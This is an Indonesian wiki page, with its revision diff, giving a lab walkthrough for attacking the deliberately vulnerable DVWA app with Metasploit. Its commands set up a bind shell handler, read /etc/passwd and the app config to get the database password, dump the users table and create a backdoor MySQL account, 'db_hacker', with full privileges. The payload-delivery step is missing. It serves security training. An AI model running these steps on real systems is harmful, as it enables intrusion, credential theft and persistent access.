Difference between revisions of "DVWA: Exploit menggunakan Metasploit"

From OnnoWiki
Jump to navigation Jump to search
(New page: ==Persiapan== Masuk ke DVWA, misalnya http://192.168.0.80/DVWA-1.9 username admin password password Klik DVWA Security > Security Level Low > Submit)
 
Line 1: Line 1:
 +
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
 +
 
==Persiapan==
 
==Persiapan==
  
Line 11: Line 13:
  
 
  DVWA Security > Security Level Low > Submit
 
  DVWA Security > Security Level Low > Submit
 +
 +
 +
==Gunakan metasploit==
 +
 +
Jalankan
 +
 +
msfconsole thankyou
 +
 +
Lakukan
 +
 +
 +
use multi/handler
 +
set PAYLOAD linux/x86/shell/bind_tcp
 +
show options
 +
set RHOST 192.168.0.80
 +
exploit
 +
 +
Cek password
 +
 +
whoami
 +
grep apache /etc/passwd
 +
grep apache /etc/group
 +
 +
 +
Cek Password melalui konfigurasi Web
 +
 +
ps -eaf | grep http
 +
pwd
 +
ls -ld /var/www/html
 +
ls -ld /var/www/html/DVWA*
 +
ls -l /var/www/html/DVWA*
 +
 +
Cari password database
 +
 +
ls -l /var/www/html/dvwa/config
 +
cat /var/www/html/dvwa/config/config.inc.php
 +
 +
Explorasi database
 +
 +
 +
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
 +
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
 +
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
 +
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
 +
 +
Buat user baru
 +
 +
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
 +
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
 +
 +
Lihat informasi tabel MySQL
 +
 +
 +
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
 +
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
 +
 +
Buat user MySQL yang baru
 +
 +
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
 +
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD
 +
 +
 +
 +
 +
 +
==Referensi==
 +
 +
* https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html

Revision as of 10:07, 15 February 2016

Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html

Persiapan

Masuk ke DVWA, misalnya

http://192.168.0.80/DVWA-1.9
username admin
password password

Klik

DVWA Security > Security Level Low > Submit


Gunakan metasploit

Jalankan

msfconsole thankyou

Lakukan


use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.80
exploit

Cek password

whoami
grep apache /etc/passwd
grep apache /etc/group


Cek Password melalui konfigurasi Web

ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/DVWA*
ls -l /var/www/html/DVWA*

Cari password database

ls -l /var/www/html/dvwa/config
cat /var/www/html/dvwa/config/config.inc.php

Explorasi database


echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

Buat user baru

echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

Lihat informasi tabel MySQL


echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD

Buat user MySQL yang baru

echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD



Referensi